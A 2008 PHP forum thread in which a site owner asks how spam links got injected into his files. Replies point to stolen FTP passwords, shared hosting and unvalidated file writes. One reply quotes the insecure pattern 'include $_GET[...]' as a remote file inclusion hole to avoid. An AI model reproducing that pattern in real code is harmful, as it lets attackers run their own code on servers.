mrMarcus Posted November 23, 2008 Share Posted November 23, 2008 Hello there, anybody heard of/seen this before .. i have no idea how this is happening, but i was looking over my source code today, and noticed that at the top and the bottom of the source, there were hundreds of links that had been injected/inserted into the source code somehow. now, i grabbed the files off the server and some actually had the links physically in the file, and some it was only viewable via the web browser/view source code. i scanned and searched my database, it's clean. how does this happen, and what can i do to prevent this from happening again? Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/ Share on other sites More sharing options...
Adam Posted November 23, 2008 Share Posted November 23, 2008 Can't say how they will have done it without seeing anything but, you'd be best looking into PHP security.. http://www.sitepoint.com/article/php-security-blunders/ - should protect from any further problems! Adam Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697247 Share on other sites More sharing options...
mrMarcus Posted November 23, 2008 Author Share Posted November 23, 2008 thanks for the reply... thing is, i wouldn't even know where to begin when trying to give you guys some examples .. i can't figure out a point of entry for such an attack .. like i said, there is nothing stored in the database, and i've thoroughly scanned all directories for any suspicious files and such. i'm stumped, and very worried .. apparently these kinds of incidents can get you blacklisted from Google, etc... Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697268 Share on other sites More sharing options...
waynew Posted November 23, 2008 Share Posted November 23, 2008 What kind of hosting do you have? Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697285 Share on other sites More sharing options...
corbin Posted November 23, 2008 Share Posted November 23, 2008 If you want, you could link us to the live site and we could try to find the hole. Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697297 Share on other sites More sharing options...
phil88 Posted November 24, 2008 Share Posted November 24, 2008 If you're on a shared host, it could be a vulnerability in someone else's site that is messing up your site because it's on the same server. Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697303 Share on other sites More sharing options...
mrMarcus Posted November 24, 2008 Author Share Posted November 24, 2008 ^i did just changed hosting companies a few days ago to HostGator.com .. seemed like a reputable gig. If you want, you could link us to the live site and we could try to find the hole. my site is www.transcanadarentals.com .. it's been an ongoing project of mine for years now .. but just recently, i've really tried to buckle down and get going on it. Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697326 Share on other sites More sharing options...
awpti Posted November 24, 2008 Share Posted November 24, 2008 Most likely someone broke your FTP Password and just uploaded the changes. Some content can be pulled in via javascript (hence "only viewable via the web"). Use a stronger password and check for vulnerabilities in your PHP Application (I'm guessing you didn't write it, so check the developer's site for news/info). Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697386 Share on other sites More sharing options...
mrMarcus Posted November 24, 2008 Author Share Posted November 24, 2008 Most likely someone broke your FTP Password and just uploaded the changes. Some content can be pulled in via javascript (hence "only viewable via the web"). Use a stronger password and check for vulnerabilities in your PHP Application (I'm guessing you didn't write it, so check the developer's site for news/info). i wrote that entire site from scratch. like i said, it's been an ongoing project for quite some time now. thanks for the FTP tip .. i'll definately check into that. i'm just gonna have to go back over my forms .. i have captcha set up on a couple of the forms, but not all .. these web bots feed on unprotected forms. thanks for the feedback(Y) Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697407 Share on other sites More sharing options...
corbin Posted November 24, 2008 Share Posted November 24, 2008 Hrmmm.... Do any of your pages write files? Someone could've exploited a page to write a file. When I suggested posting the link, I didn't realize it was such a large site. Usually such problems are found on smaller sites x.x. Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697409 Share on other sites More sharing options...
mrMarcus Posted November 24, 2008 Author Share Posted November 24, 2008 Hrmmm.... Do any of your pages write files? Someone could've exploited a page to write a file. When I suggested posting the link, I didn't realize it was such a large site. Usually such problems are found on smaller sites x.x. ya, it's a pretty large site:S and no, no page writes any file(s) .. no pages contain write permissions either. Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697709 Share on other sites More sharing options...
PFMaBiSmAd Posted November 24, 2008 Share Posted November 24, 2008 One common security hole of dynamically generated sites is to use a php include statement to include pages/content based on a GET parameter, but there is no validation of the value and this allows external raw php code to be included from a hackers site and executed on your server. This included code can do anything that your script can do. Doing anything like - include $_GET['some_parameter_on_the_end_of_the_url']; Quote Link to comment https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/#findComment-697720 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.